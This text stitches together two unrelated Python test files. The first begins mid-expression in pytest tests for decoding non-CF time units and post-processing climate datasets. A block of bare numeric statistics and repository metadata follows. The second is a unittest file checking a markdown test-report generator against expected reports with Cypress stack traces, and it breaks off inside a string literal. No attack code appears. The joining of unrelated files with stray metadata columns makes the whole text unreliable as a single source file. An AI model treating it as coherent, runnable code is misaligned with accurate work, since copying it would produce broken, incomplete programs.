dtype="datetime64",
),
dims=["time", "bnds"],
attrs=ds.time_bnds.attrs,
),
}
)
assert result.identical(expected)
expected.time.encoding = {
"source": "None",
"dtype": np.dtype(np.int64),
"original_shape": expected.time.data.shape,
"units": ds.time.attrs["units"],
"calendar": ds.time.attrs["calendar"],
}
expected.time_bnds.encoding = ds.time_bnds.encoding
assert result.time.encoding == expected.time.encoding
assert result.time_bnds.encoding == expected.time_bnds.encoding
def test_decodes_months_with_a_reference_date_on_a_leap_year(self):
ds = self.ds.copy()
ds.time.attrs["units"] = "months since 2000-02-29"
result = decode_non_cf_time(ds)
expected = xr.Dataset(
{
"time": xr.DataArray(
name="time",
data=np.array(
["2000-03-29", "2000-04-29", "2000-05-29"],
dtype="datetime64",
),
dims=["time"],
attrs=ds.time.attrs,
),
"time_bnds": xr.DataArray(
name="time_bnds",
data=np.array(
[
["2000-02-29", "2000-03-29"],
["2000-03-29", "2000-04-29"],
["2000-04-29", "2000-05-29"],
],
dtype="datetime64",
),
dims=["time", "bnds"],
attrs=ds.time_bnds.attrs,
),
}
)
assert result.identical(expected)
expected.time.encoding = {
"source": "None",
"dtype": np.dtype(np.int64),
"original_shape": expected.time.data.shape,
"units": ds.time.attrs["units"],
"calendar": ds.time.attrs["calendar"],
}
expected.time_bnds.encoding = ds.time_bnds.encoding
assert result.time.encoding == expected.time.encoding
assert result.time_bnds.encoding == expected.time_bnds.encoding
def test_decodes_years_with_a_reference_date_at_the_middle_of_the_year(self):
ds = self.ds.copy()
ds.time.attrs["units"] = "years since 2000-06-01"
result = decode_non_cf_time(ds)
expected = xr.Dataset(
{
"time": xr.DataArray(
name="time",
data=np.array(
["2001-06-01", "2002-06-01", "2003-06-01"],
dtype="datetime64",
),
dims=["time"],
attrs=ds.time.attrs,
),
"time_bnds": xr.DataArray(
name="time_bnds",
data=np.array(
[
["2000-06-01", "2001-06-01"],
["2001-06-01", "2002-06-01"],
["2002-06-01", "2003-06-01"],
],
dtype="datetime64",
),
dims=["time", "bnds"],
attrs=ds.time_bnds.attrs,
),
}
)
assert result.identical(expected)
expected.time.encoding = {
"source": "None",
"dtype": np.dtype(np.int64),
"original_shape": expected.time.data.shape,
"units": ds.time.attrs["units"],
"calendar": ds.time.attrs["calendar"],
}
expected.time_bnds.encoding = ds.time_bnds.encoding
assert result.time.encoding == expected.time.encoding
assert result.time_bnds.encoding == expected.time_bnds.encoding
def test_decodes_years_with_a_reference_date_on_a_leap_year(self):
    """Yearly steps from a leap-day reference decode with Feb 29 -> Feb 28.

    Consistency fix: build the expected ``time`` coordinate the same way as
    the sibling tests — an ``np.array`` with a datetime64 dtype and ``attrs``
    passed to the constructor — instead of a list of ``np.datetime64``
    scalars with ``attrs`` assigned after construction. Behavior is
    identical; only the construction style changes.
    """
    ds = self.ds.copy()
    ds.time.attrs["units"] = "years since 2000-02-29"

    result = decode_non_cf_time(ds)

    expected = xr.Dataset(
        {
            "time": xr.DataArray(
                name="time",
                data=np.array(
                    ["2001-02-28", "2002-02-28", "2003-02-28"],
                    dtype="datetime64",
                ),
                dims=["time"],
                attrs=ds.time.attrs,
            ),
            "time_bnds": xr.DataArray(
                name="time_bnds",
                data=np.array(
                    [
                        ["2000-02-29", "2001-02-28"],
                        ["2001-02-28", "2002-02-28"],
                        ["2002-02-28", "2003-02-28"],
                    ],
                    dtype="datetime64",
                ),
                dims=["time", "bnds"],
                attrs=ds.time_bnds.attrs,
            ),
        }
    )
    assert result.identical(expected)

    # Decoding should record the original units/calendar in the encoding.
    expected.time.encoding = {
        "source": "None",
        "dtype": np.dtype(np.int64),
        "original_shape": expected.time.data.shape,
        "units": ds.time.attrs["units"],
        "calendar": ds.time.attrs["calendar"],
    }
    expected.time_bnds.encoding = ds.time_bnds.encoding
    assert result.time.encoding == expected.time.encoding
    assert result.time_bnds.encoding == expected.time_bnds.encoding
class TestPostProcessDataset:
    """Tests for `_postprocess_dataset`: data-var subsetting, time centering,
    missing-bounds generation, and longitude re-orientation."""

    @pytest.fixture(autouse=True)
    def setup(self):
        # Fresh CF-compliant dataset (with bounds) for every test.
        self.ds = generate_dataset(cf_compliant=True, has_bounds=True)

    def test_keeps_specified_var(self):
        ds = generate_dataset(cf_compliant=True, has_bounds=True)
        # Create a modified version of the Dataset with a new var
        ds_mod = ds.copy()
        ds_mod["tas"] = ds_mod.ts.copy()
        # NOTE(review): `ds_mod` is constructed but never used — presumably
        # `_postprocess_dataset` was meant to be called on `ds_mod` so that
        # dropping "tas" is actually exercised; confirm intent.
        result = _postprocess_dataset(ds, data_var="ts")
        expected = ds.copy()
        assert result.identical(expected)

    def test_centers_time(self):
        ds = generate_dataset(cf_compliant=True, has_bounds=True)
        # Time coordinates positioned at the end of each interval (uncentered).
        uncentered_time = np.array(
            [
                "2000-01-31T12:00:00.000000000",
                "2000-02-29T12:00:00.000000000",
                "2000-03-31T12:00:00.000000000",
                "2000-04-30T00:00:00.000000000",
                "2000-05-31T12:00:00.000000000",
                "2000-06-30T00:00:00.000000000",
                "2000-07-31T12:00:00.000000000",
                "2000-08-31T12:00:00.000000000",
                "2000-09-30T00:00:00.000000000",
                "2000-10-16T12:00:00.000000000",
                "2000-11-30T00:00:00.000000000",
                "2000-12-31T12:00:00.000000000",
                "2001-01-31T12:00:00.000000000",
                "2001-02-28T00:00:00.000000000",
                "2001-12-31T12:00:00.000000000",
            ],
            dtype="datetime64[ns]",
        )
        ds.time.data[:] = uncentered_time
        ds.time.encoding = {
            "source": None,
            "dtype": np.dtype(np.int64),
            "original_shape": ds.time.data.shape,
            "units": "days since 2000-01-01",
            "calendar": "standard",
            "_FillValue": False,
        }
        # Compare result of the method against the expected.
        result = _postprocess_dataset(ds, center_times=True)
        expected = ds.copy()
        # Centered coordinates: midpoints of each interval's time bounds.
        expected_time_data = np.array(
            [
                "2000-01-16T12:00:00.000000000",
                "2000-02-15T12:00:00.000000000",
                "2000-03-16T12:00:00.000000000",
                "2000-04-16T00:00:00.000000000",
                "2000-05-16T12:00:00.000000000",
                "2000-06-16T00:00:00.000000000",
                "2000-07-16T12:00:00.000000000",
                "2000-08-16T12:00:00.000000000",
                "2000-09-16T00:00:00.000000000",
                "2000-10-16T12:00:00.000000000",
                "2000-11-16T00:00:00.000000000",
                "2000-12-16T12:00:00.000000000",
                "2001-01-16T12:00:00.000000000",
                "2001-02-15T00:00:00.000000000",
                "2001-12-16T12:00:00.000000000",
            ],
            dtype="datetime64[ns]",
        )
        expected = expected.assign_coords(
            {
                "time": xr.DataArray(
                    name="time",
                    data=expected_time_data,
                    coords={"time": expected_time_data},
                    dims="time",
                    attrs={
                        "long_name": "time",
                        "standard_name": "time",
                        "axis": "T",
                        "bounds": "time_bnds",
                    },
                )
            }
        )
        # Centering must not alter the pre-existing time encoding.
        expected.time.encoding = {
            "source": None,
            "dtype": np.dtype("int64"),
            "original_shape": (15,),
            "units": "days since 2000-01-01",
            "calendar": "standard",
            "_FillValue": False,
        }
        # Update time bounds with centered time coordinates.
        time_bounds = ds.time_bnds.copy()
        time_bounds["time"] = expected.time
        expected["time_bnds"] = time_bounds
        # Compare result of the function against the expected.
        assert result.identical(expected)
        assert result.time.encoding == expected.time.encoding

    def test_raises_error_if_dataset_has_no_time_coords_but_center_times_is_true(self):
        ds = generate_dataset(cf_compliant=True, has_bounds=False)
        ds = ds.drop_dims("time")
        with pytest.raises(ValueError):
            _postprocess_dataset(ds, center_times=True)

    def test_adds_missing_lat_and_lon_bounds(self):
        # Create expected dataset without bounds.
        ds = generate_dataset(cf_compliant=True, has_bounds=False)
        data_vars = list(ds.data_vars.keys())
        assert "lat_bnds" not in data_vars
        assert "lon_bnds" not in data_vars
        result = _postprocess_dataset(ds, add_bounds=True)
        result_data_vars = list(result.data_vars.keys())
        assert "lat_bnds" in result_data_vars
        assert "lon_bnds" in result_data_vars

    def test_orients_longitude_bounds_from_180_to_360_and_sorts_with_prime_meridian_cell(
        self,
    ):
        # Chunk the dataset to test method also works with Dask.
        ds = xr.Dataset(
            coords={
                "lon": xr.DataArray(
                    name="lon",
                    data=np.array([-180, -1, 0, 1, 179]),
                    dims=["lon"],
                    attrs={"units": "degrees_east", "axis": "X", "bounds": "lon_bnds"},
                )
            },
            data_vars={
                "lon_bnds": xr.DataArray(
                    name="lon_bnds",
                    data=np.array(
                        [
                            [-180.5, -1.5],
                            [-1.5, -0.5],
                            [-0.5, 0.5],
                            [0.5, 1.5],
                            [1.5, 179.5],
                        ]
                    ),
                    dims=["lon", "bnds"],
                    attrs={"is_generated": "True"},
                ),
            },
        ).chunk({"lon": 2})
        result = _postprocess_dataset(
            ds, data_var=None, center_times=False, add_bounds=True, lon_orient=(0, 360)
        )
        # The cell straddling the prime meridian is split and the axis is
        # sorted into the (0, 360) orientation.
        expected = xr.Dataset(
            coords={
                "lon": xr.DataArray(
                    name="lon",
                    data=np.array([0.0, 1.0, 179.0, 180.0, 359.0, 360.0]),
                    dims=["lon"],
                    attrs={"units": "degrees_east", "axis": "X", "bounds": "lon_bnds"},
                )
            },
            data_vars={
                "lon_bnds": xr.DataArray(
                    name="lon_bnds",
                    data=np.array(
                        [
                            [0, 0.5],
                            [0.5, 1.5],
                            [1.5, 179.5],
                            [179.5, 358.5],
                            [358.5, 359.5],
                            [359.5, 360],
                        ]
                    ),
                    dims=["lon", "bnds"],
                    attrs={"is_generated": "True"},
                ),
            },
        )
        assert result.identical(expected)

    def test_raises_error_if_dataset_has_no_longitude_coords_but_lon_orient_is_specified(
        self,
    ):
        ds = generate_dataset(cf_compliant=True, has_bounds=False)
        ds = ds.drop_dims("lon")
        with pytest.raises(ValueError):
            _postprocess_dataset(ds, lon_orient=(0, 360))
class TestKeepSingleVar:
    """Tests for `_keep_single_var`, which subsets a dataset to a single data
    variable while always retaining bounds variables."""

    @pytest.fixture(autouse=True)
    def setup(self):
        self.ds = generate_dataset(cf_compliant=True, has_bounds=True)
        # Variant of the dataset with an extra "tas" data variable.
        self.ds_mod = self.ds.copy()
        self.ds_mod["tas"] = self.ds_mod.ts.copy()

    def tests_raises_error_if_only_bounds_data_variables_exist(self):
        bounds_only = self.ds.copy().drop_vars("ts")
        with pytest.raises(ValueError):
            _keep_single_var(bounds_only, key="ts")

    def test_raises_error_if_specified_data_var_does_not_exist(self):
        with pytest.raises(ValueError):
            _keep_single_var(self.ds_mod.copy(), key="nonexistent")

    def test_raises_error_if_specified_data_var_is_a_bounds_var(self):
        with pytest.raises(ValueError):
            _keep_single_var(self.ds_mod.copy(), key="lat_bnds")

    def test_returns_dataset_with_specified_data_var(self):
        result = _keep_single_var(self.ds_mod, key="ts")
        # Only "ts" (plus bounds) remains, so the result matches the
        # unmodified dataset and differs from the two-variable one.
        assert result.identical(self.ds.copy())
        assert not result.identical(self.ds_mod)

    def test_bounds_always_persist(self):
        subset = _keep_single_var(self.ds_mod, key="ts")
        for bounds_var in ("lat_bnds", "lon_bnds", "time_bnds"):
            assert subset.get(bounds_var) is not None
class TestPreProcessNonCFDataset:
    """Tests for `_preprocess_non_cf_dataset` with a user-supplied callable."""

    @pytest.fixture(autouse=True)
    def setup(self):
        self.ds = generate_dataset(cf_compliant=False, has_bounds=True)

    def test_user_specified_callable_results_in_subsetting_dataset_on_time_slice(self):
        # Fix: the inner preprocess function was named `callable`, shadowing
        # the Python builtin; renamed to a descriptive local name.
        def subset_first_time_step(ds):
            return ds.isel(time=slice(0, 1))

        ds = self.ds.copy()
        result = _preprocess_non_cf_dataset(ds, subset_first_time_step)

        expected = ds.copy().isel(time=slice(0, 1))
        expected["time"] = xr.DataArray(
            name="time",
            data=np.array(
                ["2000-01-01"],
                dtype="datetime64",
            ),
            dims=["time"],
        )
        expected["time_bnds"] = xr.DataArray(
            name="time_bnds",
            data=np.array(
                [["1999-12-01", "2000-01-01"]],
                dtype="datetime64",
            ),
            dims=["time", "bnds"],
        )
        expected.time.attrs = ds.time.attrs
        expected.time_bnds.attrs = ds.time_bnds.attrs
        assert result.identical(expected)
class TestSplitTimeUnitsAttr:
    """Tests for `_split_time_units_attr` ("<unit> since <reference>")."""

    def test_raises_error_if_units_attr_is_none(self):
        with pytest.raises(KeyError):
            _split_time_units_attr(None)  # type: ignore

    def test_splits_units_attr_to_unit_and_reference_date(self):
        # Table-driven: units string -> (unit, reference date) pair.
        cases = {
            "months since 1800": ("months", "1800"),
            "months since 1800-01-01": ("months", "1800-01-01"),
            "months since 1800-01-01 00:00:00": ("months", "1800-01-01 00:00:00"),
        }
        for units, expected in cases.items():
            assert _split_time_units_attr(units) == expected
| 37.352391
| 89
| 0.531155
| 4,079
| 35,933
| 4.495219
| 0.071831
| 0.027051
| 0.085079
| 0.085297
| 0.840096
| 0.80541
| 0.774978
| 0.747055
| 0.721204
| 0.698517
| 0
| 0.152846
| 0.345254
| 35,933
| 961
| 90
| 37.391259
| 0.626514
| 0.059806
| 0
| 0.613551
| 1
| 0
| 0.188904
| 0.103136
| 0
| 0
| 0
| 0
| 0.065245
| 1
| 0.055207
| false
| 0
| 0.010038
| 0.001255
| 0.076537
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4cbfd7715f9b83ddc84288f6b0b486b797a48ebd
| 17,471
|
py
|
Python
|
test/testMarkdownGenerator.py
|
open-cluster-management/canary-reporting
|
d97d49fb83e8e8d5e56b937261928285303e475e
|
[
"Apache-2.0"
] | null | null | null |
test/testMarkdownGenerator.py
|
open-cluster-management/canary-reporting
|
d97d49fb83e8e8d5e56b937261928285303e475e
|
[
"Apache-2.0"
] | 35
|
2021-03-24T14:57:42.000Z
|
2021-09-23T18:37:58.000Z
|
test/testMarkdownGenerator.py
|
open-cluster-management/canary-reporting
|
d97d49fb83e8e8d5e56b937261928285303e475e
|
[
"Apache-2.0"
] | 1
|
2021-08-02T14:26:55.000Z
|
2021-08-02T14:26:55.000Z
|
import unittest, os, sys
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '../..')))
from generators import MarkdownGenerator
class TestMarkdownGenerator(unittest.TestCase):
    """Golden-output tests for MarkdownGenerator.generate_markdown_report.

    Each test builds a generator over the canned results in
    `test_results_dir` and compares the full rendered markdown report
    against an expected literal string.
    """

    # Directory of canned test results consumed by the generator.
    results_folder = f"{os.path.dirname(os.path.abspath(__file__))}/test_results_dir"
    # Failures matching these entries are reported as "ignored" rather than
    # "failed" when the ignorelist is passed to the generator.
    ignorelist = [
        {
            "name": "Search: Viewer is NOT able to edit configmaps",
            "squad": "search",
            "owner": "@anonymous-user-that-I-wont-name"
        },
        {
            "name": "Search: Load page",
            "squad": "search",
            "owner": "@anonymous-user-that-I-wont-name"
        }
    ]

    def test_markdown_report_full(self):
        # All optional metadata supplied; empty ignorelist, so all three
        # failing tests appear as :x: failures.
        _md_generator = MarkdownGenerator.MarkdownGenerator(
            [TestMarkdownGenerator.results_folder],
            snapshot="TEST_SNAPSHOT",
            branch="TEST_BRANCH",
            stage="TEST_STAGE",
            hub_version="TEST_HUB_VERSION",
            hub_platform="TEST_HUB_PLATFORM",
            import_cluster_details=[
                {
                    "clustername": "cluster1",
                    "version": "4.7.0",
                    "platform": "aws"
                },
                {
                    "clustername": "cluster2",
                    "version": "4.7.1",
                    "platform": "gcp"
                }
            ],
            job_url="TEST_JOB_URL",
            build_id="TEST_BUILD_ID",
            sd_url="TEST_SD_URL",
            issue_url="TEST_ISSUE_URL",
            ignorelist=[]
        )
        _md_report = _md_generator.generate_markdown_report()
        self.assertEqual(_md_report, """# :red_circle:TEST_SNAPSHOT Failed on branch Test_stage
## Job URL: TEST_JOB_URL
## Artifacts & Details
[**Snapshot Diff**](TEST_SD_URL)
[**Opened Issue**](TEST_ISSUE_URL)
**Hub Cluster Platform:** TEST_HUB_PLATFORM **Hub Cluster Version:** TEST_HUB_VERSION
**Import Cluster(s):**
* **Import Cluster Platform:** aws **Import Cluster Version:** 4.7.0
* **Import Cluster Platform:** gcp **Import Cluster Version:** 4.7.1
## Quality Gate
:warning: **Percentage Executed:** 92.31% (100% Quality Gate)
:red_circle: **Percentage Passing:** 75.0% (100% Quality Gate)
## Summary
**:white_check_mark: 9 Tests Passed**
**:x: 3 Tests Failed**
**:large_orange_diamond: 0 Failures Ignored**
**:large_blue_circle: 1 Test Case Skipped**
## Test Case Summary
|Results|Testsuite|Test|
|---|---|---|
| :white_check_mark: | Cluster | Cluster can be created on AWS |
| :white_check_mark: | Cluster | Cluster comes to the Ready status - "ds8-aws-444" |
| :white_check_mark: | Cluster | Cluster import command can be applied on "ds8-aws-444" |
| :white_check_mark: | Cluster | Cluster import command can be generated for "ds8-aws-444" |
| :large_blue_circle: | adminSearch.test | Edit secret as Admin user |
| :white_check_mark: | Overview | Overview page should load |
| :white_check_mark: | Provider connections | Provider connections page should load |
| :x: | Provider connections | Provider connections should be able to be created |
| :white_check_mark: | Provider connections | Provider connections should be abled to be edited |
| :white_check_mark: | adminSearch.test | Search: Load page |
| :white_check_mark: | viewerSearch.test | Search: Load page |
| :x: | adminSearch.test | Search: Search for secret |
| :x: | viewerSearch.test | Search: Viewer is NOT able to edit configmaps |
## Failing Tests
### :x: Provider connections -> Provider connections should be able to be created
```
CypressError: Timed out retrying: `cy.click()` failed because this element is `disabled`:
`<button tabindex="0" class="bx--btn bx--btn--primary" disabled="" type="button">Go to p...</button>`
Fix this problem, or use `{force: true}` to disable error checking.
https://on.cypress.io/element-cannot-be-interacted-with
    at cypressErr (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:146621:16)
    at cypressErrByPath (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:146630:10)
    at Object.throwErrByPath (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:146593:11)
    at Object.ensureNotDisabled (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:137570:24)
    at runAllChecks (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:127486:14)
    at retryActionability (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:127542:16)
    at tryCatcher (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:9065:23)
    at Function.Promise.attempt.Promise.try (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:6339:29)
    at tryFn (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:140680:21)
    at whenStable (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:140715:12)
    at https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:140259:16
    at tryCatcher (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:9065:23)
    at Promise._settlePromiseFromHandler (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:7000:31)
    at Promise._settlePromise (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:7057:18)
    at Promise._settlePromise0 (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:7102:10)
    at Promise._settlePromises (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:7182:18)
```
### :x: adminSearch.test -> Search: Search for secret
```
   at Page.enterTextInSearchbar (/tests/page-objects/SearchPage.js:73:8)
   at Object.Search: Search for secret (/tests/e2e/adminSearch.test.js:34:16)
```
### :x: viewerSearch.test -> Search: Viewer is NOT able to edit configmaps
```
   at Page.enterTextInSearchbar (/tests/page-objects/SearchPage.js:73:8)
   at Object.Search: Viewer is NOT able to edit configmaps (/tests/e2e/viewerSearch.test.js:41:16)
```
""")

    def test_markdown_report_ignorelist(self):
        # Same inputs as the full report, but with the class ignorelist: the
        # viewerSearch configmaps failure is reported as ignored
        # (:large_orange_diamond:) instead of failed.
        _md_generator = MarkdownGenerator.MarkdownGenerator(
            [TestMarkdownGenerator.results_folder],
            snapshot="TEST_SNAPSHOT",
            branch="TEST_BRANCH",
            stage="TEST_STAGE",
            hub_version="TEST_HUB_VERSION",
            hub_platform="TEST_HUB_PLATFORM",
            import_cluster_details=[
                {
                    "clustername": "cluster1",
                    "version": "4.7.0",
                    "platform": "aws"
                },
                {
                    "clustername": "cluster2",
                    "version": "4.7.1",
                    "platform": "gcp"
                }
            ],
            job_url="TEST_JOB_URL",
            build_id="TEST_BUILD_ID",
            sd_url="TEST_SD_URL",
            issue_url="TEST_ISSUE_URL",
            ignorelist=TestMarkdownGenerator.ignorelist
        )
        _md_report = _md_generator.generate_markdown_report()
        self.assertEqual(_md_report, """# :red_circle:TEST_SNAPSHOT Failed on branch Test_stage
## Job URL: TEST_JOB_URL
## Artifacts & Details
[**Snapshot Diff**](TEST_SD_URL)
[**Opened Issue**](TEST_ISSUE_URL)
**Hub Cluster Platform:** TEST_HUB_PLATFORM **Hub Cluster Version:** TEST_HUB_VERSION
**Import Cluster(s):**
* **Import Cluster Platform:** aws **Import Cluster Version:** 4.7.0
* **Import Cluster Platform:** gcp **Import Cluster Version:** 4.7.1
## Quality Gate
:warning: **Percentage Executed:** 92.31% (100% Quality Gate)
:red_circle: **Percentage Passing:** 75.0% (100% Quality Gate)
## Summary
**:white_check_mark: 9 Tests Passed**
**:x: 2 Tests Failed**
**:large_orange_diamond: 1 Failure Ignored**
**:large_blue_circle: 1 Test Case Skipped**
## Test Case Summary
|Results|Testsuite|Test|
|---|---|---|
| :white_check_mark: | Cluster | Cluster can be created on AWS |
| :white_check_mark: | Cluster | Cluster comes to the Ready status - "ds8-aws-444" |
| :white_check_mark: | Cluster | Cluster import command can be applied on "ds8-aws-444" |
| :white_check_mark: | Cluster | Cluster import command can be generated for "ds8-aws-444" |
| :large_blue_circle: | adminSearch.test | Edit secret as Admin user |
| :white_check_mark: | Overview | Overview page should load |
| :white_check_mark: | Provider connections | Provider connections page should load |
| :x: | Provider connections | Provider connections should be able to be created |
| :white_check_mark: | Provider connections | Provider connections should be abled to be edited |
| :white_check_mark: | adminSearch.test | Search: Load page |
| :white_check_mark: | viewerSearch.test | Search: Load page |
| :x: | adminSearch.test | Search: Search for secret |
| :large_orange_diamond: | viewerSearch.test | Search: Viewer is NOT able to edit configmaps |
## Failing Tests
### :x: Provider connections -> Provider connections should be able to be created
```
CypressError: Timed out retrying: `cy.click()` failed because this element is `disabled`:
`<button tabindex="0" class="bx--btn bx--btn--primary" disabled="" type="button">Go to p...</button>`
Fix this problem, or use `{force: true}` to disable error checking.
https://on.cypress.io/element-cannot-be-interacted-with
    at cypressErr (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:146621:16)
    at cypressErrByPath (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:146630:10)
    at Object.throwErrByPath (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:146593:11)
    at Object.ensureNotDisabled (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:137570:24)
    at runAllChecks (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:127486:14)
    at retryActionability (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:127542:16)
    at tryCatcher (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:9065:23)
    at Function.Promise.attempt.Promise.try (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:6339:29)
    at tryFn (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:140680:21)
    at whenStable (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:140715:12)
    at https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:140259:16
    at tryCatcher (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:9065:23)
    at Promise._settlePromiseFromHandler (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:7000:31)
    at Promise._settlePromise (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:7057:18)
    at Promise._settlePromise0 (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:7102:10)
    at Promise._settlePromises (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:7182:18)
```
### :x: adminSearch.test -> Search: Search for secret
```
   at Page.enterTextInSearchbar (/tests/page-objects/SearchPage.js:73:8)
   at Object.Search: Search for secret (/tests/e2e/adminSearch.test.js:34:16)
```
### :large_orange_diamond: viewerSearch.test -> Search: Viewer is NOT able to edit configmaps
```
   at Page.enterTextInSearchbar (/tests/page-objects/SearchPage.js:73:8)
   at Object.Search: Viewer is NOT able to edit configmaps (/tests/e2e/viewerSearch.test.js:41:16)
```
""")

    def test_markdown_report_min(self):
        # Only the results folder is supplied: the header and artifact
        # sections collapse to their minimal forms.
        _md_generator = MarkdownGenerator.MarkdownGenerator([TestMarkdownGenerator.results_folder])
        _md_report = _md_generator.generate_markdown_report()
        self.assertEqual(_md_report, """# :red_circle: Failed
## Artifacts & Details
## Quality Gate
:warning: **Percentage Executed:** 92.31% (100% Quality Gate)
:red_circle: **Percentage Passing:** 75.0% (100% Quality Gate)
## Summary
**:white_check_mark: 9 Tests Passed**
**:x: 3 Tests Failed**
**:large_orange_diamond: 0 Failures Ignored**
**:large_blue_circle: 1 Test Case Skipped**
## Test Case Summary
|Results|Testsuite|Test|
|---|---|---|
| :white_check_mark: | Cluster | Cluster can be created on AWS |
| :white_check_mark: | Cluster | Cluster comes to the Ready status - "ds8-aws-444" |
| :white_check_mark: | Cluster | Cluster import command can be applied on "ds8-aws-444" |
| :white_check_mark: | Cluster | Cluster import command can be generated for "ds8-aws-444" |
| :large_blue_circle: | adminSearch.test | Edit secret as Admin user |
| :white_check_mark: | Overview | Overview page should load |
| :white_check_mark: | Provider connections | Provider connections page should load |
| :x: | Provider connections | Provider connections should be able to be created |
| :white_check_mark: | Provider connections | Provider connections should be abled to be edited |
| :white_check_mark: | adminSearch.test | Search: Load page |
| :white_check_mark: | viewerSearch.test | Search: Load page |
| :x: | adminSearch.test | Search: Search for secret |
| :x: | viewerSearch.test | Search: Viewer is NOT able to edit configmaps |
## Failing Tests
### :x: Provider connections -> Provider connections should be able to be created
```
CypressError: Timed out retrying: `cy.click()` failed because this element is `disabled`:
`<button tabindex="0" class="bx--btn bx--btn--primary" disabled="" type="button">Go to p...</button>`
Fix this problem, or use `{force: true}` to disable error checking.
https://on.cypress.io/element-cannot-be-interacted-with
    at cypressErr (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:146621:16)
    at cypressErrByPath (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:146630:10)
    at Object.throwErrByPath (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:146593:11)
    at Object.ensureNotDisabled (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:137570:24)
    at runAllChecks (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:127486:14)
    at retryActionability (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:127542:16)
    at tryCatcher (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:9065:23)
    at Function.Promise.attempt.Promise.try (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:6339:29)
    at tryFn (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:140680:21)
    at whenStable (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:140715:12)
    at https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:140259:16
    at tryCatcher (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:9065:23)
    at Promise._settlePromiseFromHandler (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:7000:31)
    at Promise._settlePromise (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:7057:18)
    at Promise._settlePromise0 (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:7102:10)
    at Promise._settlePromises (https://multicloud-console.apps.ds4-aws-444.aws.red-chesterfield.com/__cypress/runner/cypress_runner.js:7182:18)
```
### :x: adminSearch.test -> Search: Search for secret
```
